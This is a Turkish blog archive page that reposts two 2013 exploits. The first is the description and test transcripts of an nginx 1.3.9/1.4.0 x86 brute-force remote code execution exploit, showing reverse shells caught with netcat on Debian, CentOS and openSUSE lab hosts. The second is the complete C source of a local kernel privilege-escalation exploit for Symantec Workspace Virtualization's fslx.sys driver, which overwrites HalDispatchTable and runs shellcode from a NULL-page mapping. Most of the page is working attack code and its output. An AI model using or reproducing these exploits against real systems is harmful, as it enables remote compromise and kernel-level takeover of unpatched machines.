Archive for 18 Temmuz 2013

nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit

nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit Uzaktan kod çalıştırma back connect açığına ilişkin açıklamalar aşağıdaki gibidir.

#nginx 1.3.9/1.4.0 x86 brute force remote exploit
# copyright (c) 2013 kingcope
#----------------------------
#fix for internet exploitation, set MTU:
#ifconfig <interface> mtu 60000 up
#
###
# !!! WARNING !!! 
# this exploit is unlikely to succeed when used against remote internet hosts.
# the reason is that nginx uses a non-blocking read() at the remote connection,
# this makes exploitation of targets on the internet highly unreliable.
# (it has been tested against a testbed on the internet but I couldn't exploit
# any other box with it. required was the above ifconfig setting on the client.
# maybe enabling large tcp frame support on a gigabit connection is more
# useful)
# so use it inside intranets only (duh!), this remains a PoC for now 😀
# The exploit does not break stack cookies but makes use of a reliable method
# to retrieve all needed offsets for Linux x86 and pop a shell.
###
#TODO
#*cleanup code
#*implement stack cookie break and amd64 support
#*support proxy_pass directive
###
=for comment
TARGET TESTS (Debian, Centos, OpenSuSE)

1. Debian 7
perl ngxunlock.pl 192.168.27.146 80 192.168.27.146 443
Testing if remote httpd is vulnerable % SEGV %
YES %
Finding align distance (estimate)
testing 5250 align  % SEGV %
testing 5182 align  % SEGV %
Verifying align
Finding align distance (estimate)
testing 5250 align  % SEGV %
testing 5182 align  % SEGV %
Finding write offset, determining exact align
testing 0x08049c50, 5184 align  % SURVIVED %
Extracting memory \
bin search done, read 20480 bytes
exact align found 5184
Finding exact library addresses
trying plt 0x08049a32, got 0x080bc1a4, function 0xb76f4a80  % FOUND exact ioctl 0x08049a30 %
trying plt 0x08049ce2, got 0x080bc250, function 0xb773e890  % FOUND exact memset 0x08049ce0 %
trying plt 0x08049d52, got 0x080bc26c, function 0xb76f8d40  % FOUND exact mmap64 0x08049d50 %
Found library offsets, determining mnemonics
trying 0x0804ed2d  % SURVIVED %
exact large pop ret 0x0804a7eb
exact pop x3 ret 0x0804a7ee
bin search done |
See reverse handler for success

nc -v -l -p 443
listening on [any] 443 ...
192.168.27.146: inverse host lookup failed: Unknown host
connect to [192.168.27.146] from (UNKNOWN) [192.168.27.146] 34778
uname -a;id;
Linux dakkong 3.2.0-4-686-pae #1 SMP Debian 3.2.46-1 i686 GNU/Linux
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
cat /etc/debian_version
7.1

2. CentOS 6.4
perl ngxunlock.pl 192.168.27.129 80 192.168.27.129 443
Testing if remote httpd is vulnerable % SEGV %
YES %
Finding align distance (estimate)
testing 5250 align  % SEGV %
testing 5194 align  % SEGV %
Verifying align
Finding align distance (estimate)
testing 5250 align  % SEGV %
testing 5194 align  % SEGV %
Finding write offset, determining exact align
testing 0x08049990, 5200 align  % SURVIVED %
Extracting memory /
bin search done, read 20480 bytes
exact align found 5200
Finding exact library addresses
trying plt 0x080499f2, got 0x080b31ac, function 0x0094a6b0  % FOUND exact memset 0x080499f0 %
trying plt 0x08049b52, got 0x080b3204, function 0x008f1fd0  % FOUND exact ioctl 0x08049b50 %
trying plt 0x08049f12, got 0x080b32f4, function 0x008f72c0  % FOUND exact mmap64 0x08049f10 %
Found library offsets, determining mnemonics
trying 0x0804e9d4  % SURVIVED %
exact large pop ret 0x0806194d
exact pop x3 ret 0x0804a832
bin search done /
See reverse handler for success

nc -v -l 443
Connection from 192.168.27.129 port 443 [tcp/https] accepted
uname -a;id;
Linux localhost.localdomain 2.6.32-358.el6.i686 #1 SMP Thu Feb 21 21:50:49 UTC 2013 i686 i686 i386 GNU/Linux
uid=99(nobody) gid=99(nobody) groups=99(nobody) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
cat /etc/redhat*
CentOS release 6.4 (Final)

3. OpenSuSE 12.1
perl ngxunlock.pl 192.168.27.135 80 192.168.27.135 443
Testing if remote httpd is vulnerable % SEGV %
YES %
Finding align distance (estimate)
testing 5250 align  % SEGV %
testing 5182 align  % SEGV %
Verifying align
Finding align distance (estimate)
testing 5250 align  % SEGV %
testing 5182 align  % SEGV %
Finding write offset, determining exact align
testing 0x08049a18, 5184 align  % SURVIVED %
Extracting memory \
bin search done, read 20480 bytes
exact align found 5184
Finding exact library addresses
trying plt 0x08049a6a, got 0x080be08c, function 0xb75f74f0  % FOUND exact memset 0x08049a68 %
trying plt 0x08049b8a, got 0x080be0d4, function 0xb764b160  % FOUND exact ioctl 0x08049b88 %
trying plt 0x08049eea, got 0x080be1ac, function 0xb76501e0  % FOUND exact mmap64 0x08049ee8 %
Found library offsets, determining mnemonics
trying 0x0804ea7f  % SURVIVED %
exact large pop ret 0x0804a7fa
exact pop x3 ret 0x0804a101
bin search done -
See reverse handler for success

Connection from 192.168.27.135 port 443 [tcp/https] accepted
uname -a;id;
Linux linux-01xg 3.1.0-1.2-desktop #1 SMP PREEMPT Thu Nov 3 14:45:45 UTC 2011 (187dde0) i686 i686 i386 GNU/Linux
uid=65534(nobody) gid=65533(nobody) groups=65533(nobody),65534(nogroup)

cat /etc/SuSE-*
openSUSE
VERSION = 12.1
openSUSE 12.1 (i586)
VERSION = 12.1
CODENAME = Asparagus
=cut

Symantec Workspace Virtualization 6.4.1895.0 Local Kernel Mode Privilege Escalation Exploit

Symantec Workspace Virtualization 6.4.1895.0 Local Kernel Mode Privilege Escalation Exploit

# Symantec Workspace Virtualization 6.4.1895.0 Local Kernel Mode Privilege Escalation Exploit
# Date: 2013-7-17
# Author : MJ0011
# Version: Symantec Workspace Virtualization 6.4.1895.0
# Tested on: Windows XP SP3

DETAILS:

In fslx.sys 's hook function of "NtQueryValueKey" , it directly write to the buffer of "ResultLength" without any check

EXPLOIT CODE:

#include "stdafx.h"
#include "windows.h"
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;
typedef const UNICODE_STRING *PCUNICODE_STRING;
typedef LONG
(WINAPI *pNtQueryValueKey)(
				 HANDLE KeyHandle,
				 PUNICODE_STRING ValueName,
				 ULONG KeyValueInformationClass,
				PVOID KeyValueInformation,
				 ULONG Length,
				 PULONG ResultLength
    );
typedef
LONG (WINAPI *pNtQueryIntervalProfile )(
						 ULONG ProfileSource,
						 PULONG Interval
    );

typedef LONG
(WINAPI *pZwQuerySystemInformation) (
						   ULONG SystemInformationClass,
						   PVOID SystemInformation,
						   ULONG SystemInformationLength,
						   PULONG ReturnLength
    );
#include "malloc.h"
PVOID GetInfoTable(ULONG ATableType)
{
ULONG mSize = 0x4000;
PVOID mPtr = NULL;
LONG status;
HMODULE hlib = GetModuleHandle("ntdll.dll");
pZwQuerySystemInformation ZwQuerySystemInformation = (pZwQuerySystemInformation)GetProcAddress(hlib , "ZwQuerySystemInformation");
do
{
mPtr = malloc(mSize);
if (mPtr)
{

	status = ZwQuerySystemInformation(ATableType , mPtr , mSize , 0 );
}
else
{
return NULL;
}
if (status == 0xc0000004)
{
free(mPtr);
mSize = mSize * 2;
}
} while (status == 0xc0000004);
if (status == 0)
{
return mPtr;
}
free(mPtr);
return NULL;
}
enum { SystemModuleInformation = 11,
SystemHandleInformation = 16 };
typedef struct {
    ULONG   Unknown1;
    ULONG   Unknown2;
    PVOID   Base;
    ULONG   Size;
    ULONG   Flags;
    USHORT Index;
    USHORT NameLength;
    USHORT LoadCount;
    USHORT PathLength;
    CHAR    ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
    ULONG   Count;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

typedef VOID (WINAPI *PINBV_ACQUIRE_DISPLAY_OWNERSHIP)(VOID);
typedef BOOLEAN (WINAPI *PINBV_RESET_DISPLAY)(VOID);
typedef VOID (WINAPI *PINBV_SOLID_COLOR_FILL)(
 ULONG x1,
 ULONG y1,
 ULONG x2,
 ULONG y2,
 ULONG color
    );
typedef ULONG (WINAPI *PINBV_SET_TEXT_COLOR)(
 ULONG Color
    );
typedef
VOID
(*INBV_DISPLAY_STRING_FILTER)(
 PUCHAR *Str
    );

typedef VOID (WINAPI *PINBV_INSTALL_DISPLAY_STRING_FILTER)(
    INBV_DISPLAY_STRING_FILTER DisplayStringFilter
    );
typedef BOOLEAN (WINAPI *PINBV_ENABLE_DISPLAY_STRING)(
    BOOLEAN bEnable
    );
typedef VOID (WINAPI *PINVB_SET_SCROLL_REGION)(
    ULONG x1,
    ULONG y1,
    ULONG x2,
    ULONG y2
    );
typedef VOID (WINAPI *PINBV_DISPLAY_STRING)(
    PUCHAR Str
    );
PINBV_ACQUIRE_DISPLAY_OWNERSHIP InbvAcquireDisplayOwnership = 0 ;
PINBV_RESET_DISPLAY InbvResetDisplay = 0 ;
PINBV_SOLID_COLOR_FILL InbvSolidColorFill = 0 ;
PINBV_SET_TEXT_COLOR InbvSetTextColor = 0 ;
PINBV_INSTALL_DISPLAY_STRING_FILTER InbvInstallDisplayStringFilter = 0 ;
PINBV_ENABLE_DISPLAY_STRING InbvEnableDisplayString = 0 ;
PINVB_SET_SCROLL_REGION InbvSetScrollRegion = 0 ;
PINBV_DISPLAY_STRING InbvDisplayString= 0 ;

#define VGA_COLOR_BLACK 0
#define VGA_COLOR_RED 1
#define VGA_COLOR_GREEN 2
#define VGA_COLOR_GR 3
#define VGA_COLOR_BULE 4
#define VGA_COLOR_DARK_MEGAENTA 5
#define VGA_COLOR_TURQUOISE 6
#define VGA_COLOR_GRAY 7
#define VGA_COLOR_BRIGHT_GRAY 8
#define VGA_COLOR_BRIGHT_RED 9
#define VGA_COLOR_BRIGHT_GREEN 10
#define VGA_COLOR_BRIGHT_YELLOW 11
#define VGA_COLOR_BRIGHT_BULE 12
#define VGA_COLOR_BRIGHT_PURPLE 13
#define VGA_COLOR_BRIGHT_TURQUOISE 14
#define VGA_COLOR_WHITE 15
UCHAR DisplayString[] =
"                                                                                "
"                                                                                "
"                                                                                "
"                ---- ===== EXPLOIT SUCCESSFULLY ==== ----                       "
"                                                                                "
"                                                                                "
" Symantec Workspace Virtualization 6.4.1895.0 Local Privilege Escalation Exploit"
"                                                                                "
" VULNERABLE PRODUCT                                                             "
"                                                                                "
" Symantec Workspace Virtualization                                              "
"                                                                                "
"                                                                                "
" VULERABLE FILE                                                                 "
" fslx.sys <= 6.4.1895.0                                                         "
"                                                                                "
" AUTHOR                                                                         "
"                                                                                "
" MJ0011                                                                         "
" th_decoder@126.com                                                             "
"                                                                                "
" 2013-7-17                                                                      "
" Symantec's technology is hundreds of years behind that of us                   "
"                                                                                "
"                                                                                ";

VOID InbvShellCode()
{
//DISABLE INTERRUPT

__asm
{
cli
}

//RESET TO VGA MODE

InbvAcquireDisplayOwnership();

InbvResetDisplay();

//FILL FULL SCREEN

InbvSolidColorFill(0 , 0 , 639 , 479 ,VGA_COLOR_BLACK);

//SET TEXT COLOR
InbvSetTextColor(VGA_COLOR_BRIGHT_GREEN);

InbvInstallDisplayStringFilter(NULL);

InbvEnableDisplayString(TRUE);

InbvSetScrollRegion( 0 , 0 , 639 ,477);

InbvDisplayString(DisplayString);
while(TRUE)
{

};

}

BOOL InbvInit(PVOID ntosbase , PSTR ntosname)
{
HMODULE hlib = LoadLibrary(ntosname);

if (hlib == NULL)
{
return FALSE ;
}

InbvAcquireDisplayOwnership = (PINBV_ACQUIRE_DISPLAY_OWNERSHIP)((ULONG)GetProcAddress(hlib , "InbvAcquireDisplayOwnership") - (ULONG)hlib + (ULONG)ntosbase);
InbvResetDisplay = (PINBV_RESET_DISPLAY)((ULONG)GetProcAddress(hlib , "InbvResetDisplay") - (ULONG)hlib + (ULONG)ntosbase);
InbvSolidColorFill = (PINBV_SOLID_COLOR_FILL)((ULONG)GetProcAddress(hlib , "InbvSolidColorFill") - (ULONG)hlib + (ULONG)ntosbase);
InbvSetTextColor = (PINBV_SET_TEXT_COLOR)((ULONG)GetProcAddress(hlib , "InbvSetTextColor") - (ULONG)hlib + (ULONG)ntosbase);
InbvInstallDisplayStringFilter = (PINBV_INSTALL_DISPLAY_STRING_FILTER)((ULONG)GetProcAddress(hlib , "InbvInstallDisplayStringFilter") - (ULONG)hlib + (ULONG)ntosbase);
InbvEnableDisplayString = (PINBV_ENABLE_DISPLAY_STRING)((ULONG)GetProcAddress(hlib , "InbvEnableDisplayString") - (ULONG)hlib + (ULONG)ntosbase);
InbvSetScrollRegion = (PINVB_SET_SCROLL_REGION)((ULONG)GetProcAddress(hlib , "InbvSetScrollRegion") - (ULONG)hlib + (ULONG)ntosbase);
InbvDisplayString = (PINBV_DISPLAY_STRING)((ULONG)GetProcAddress(hlib , "InbvDisplayString") - (ULONG)hlib + (ULONG)ntosbase);

if (InbvAcquireDisplayOwnership &&
InbvResetDisplay &&
InbvSolidColorFill &&
InbvSetTextColor &&
InbvInstallDisplayStringFilter &&
InbvEnableDisplayString &&
InbvSetScrollRegion &&
InbvDisplayString)
{
return TRUE ;
}
return FALSE ;

}

typedef LONG (WINAPI *PNT_ALLOCATE_VIRTUAL_MEMORY)(
												   HANDLE ProcessHandle,
												   PVOID *BaseAddress,
												   ULONG ZeroBits,
												   PSIZE_T RegionSize,
												   ULONG AllocationType,
												   ULONG Protect
  );
#define  ProfileTotalIssues  2

int main(int argc, char* argv[])
{
	printf("Symantec Workspace Virtualization 6.4.1895.0 Local Privilege Escalation Exploit\n"
		"fslx.sys <= 6.4.1895.0\n"
		"\nBy MJ0011\n2013-7-17\nth_decoder@126.com\nPRESS ENTER\n");

	getchar();
	PSYSTEM_MODULE_INFORMATION pinfo = (PSYSTEM_MODULE_INFORMATION)GetInfoTable(SystemModuleInformation);
	if (pinfo==0)
	{
		printf("cannot get system info\n");
		return 0 ;
	}
	if (!InbvInit(pinfo->Module[0].Base , strrchr(pinfo->Module[0].ImageName , '\\') + 1))
	{
		printf("cannot init inbv system!\n");
		return 0 ;
	}
	pNtQueryValueKey NtQueryValueKey = (pNtQueryValueKey)GetProcAddress(GetModuleHandle("ntdll.dll") ,"NtQueryValueKey");

	//alloc shellcode jump

	PNT_ALLOCATE_VIRTUAL_MEMORY NTAllocateVM = (PNT_ALLOCATE_VIRTUAL_MEMORY)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtAllocateVirtualMemory");

	PVOID BaseAddress = (PVOID)0x1 ;
	ULONG dwsize = 0x1000 ;
	LONG status ;
	status = NTAllocateVM
		(
		GetCurrentProcess() ,
		&BaseAddress ,
		0 ,
		&dwsize ,
		MEM_COMMIT | MEM_RESERVE ,
		PAGE_READWRITE
);

	if (status !=0)
	{
		printf("err alloc vm %08x\n", status);
		getchar();
		return 0 ;
	}
	//result length always <=0x800
	//0~0x800: NOP
	//0x800: shell code

	memset((PVOID)0x0 , 0x90 , 0x1000);
	*(BYTE*)((ULONG)0x800) = 0xe9 ;
	*(ULONG*)((ULONG)0x801) = (ULONG)InbvShellCode - (ULONG)0x800 - 0x5 ;

	//get haldispatchtable

	HMODULE hntos = LoadLibrary(strrchr(pinfo->Module[0].ImageName , '\\')+1);
	if (hntos == 0 )
	{
		printf("cannot load ntos\n");
		getchar();
		return 0 ;
	}
	PVOID pHalDispatchTable = GetProcAddress(hntos , "HalDispatchTable");
	pHalDispatchTable = (PVOID)((ULONG)pHalDispatchTable - (ULONG)hntos);
	pHalDispatchTable = (PVOID)((ULONG)pHalDispatchTable + (ULONG)pinfo->Module[0].Base);
	PVOID xHalQuerySystemInformationAddr = (PVOID)((ULONG)pHalDispatchTable+ sizeof(ULONG));
	FreeLibrary(hntos);

	HKEY hkey ;
	ULONG err = RegOpenKeyEx(HKEY_CURRENT_USER , "Software" , 0 , KEY_READ , &hkey);

	if (err!=ERROR_SUCCESS)
	{
		printf("open key read failed %u\n" ,err);
		getchar();
		return 0 ;
	}
	HKEY hkey2 ;

	err = RegOpenKeyEx(HKEY_CURRENT_USER , "Software" , 0 , KEY_WRITE , &hkey2);

	if (err != ERROR_SUCCESS)
	{
		printf("open key write failed %u\n", err);
		getchar();
		return 0 ;
	}
	DWORD dd ;

	err = RegSetValueEx(hkey2 , "123" , 0 , REG_DWORD , (CONST BYTE*)&dd , sizeof(DWORD));

	if (err != ERROR_SUCCESS)
	{
		printf("set value %u\n" , err);
		getchar();

		return 0 ;
}	BYTE buffer[100];
	PVOID pbuf = buffer ;

	UNICODE_STRING name ;
	name.Buffer = NULL ;
	name.Length = 0 ;
	name.MaximumLength=0;
 	 status = NtQueryValueKey(hkey , &name , 2 , pbuf , 100 , (PULONG)xHalQuerySystemInformationAddr );

	//fire our shell code

	pNtQueryIntervalProfile NtQueryIntervalProfile = (pNtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll" ) , "NtQueryIntervalProfile");

	NtQueryIntervalProfile(ProfileTotalIssues , 0 );

	return 0;
}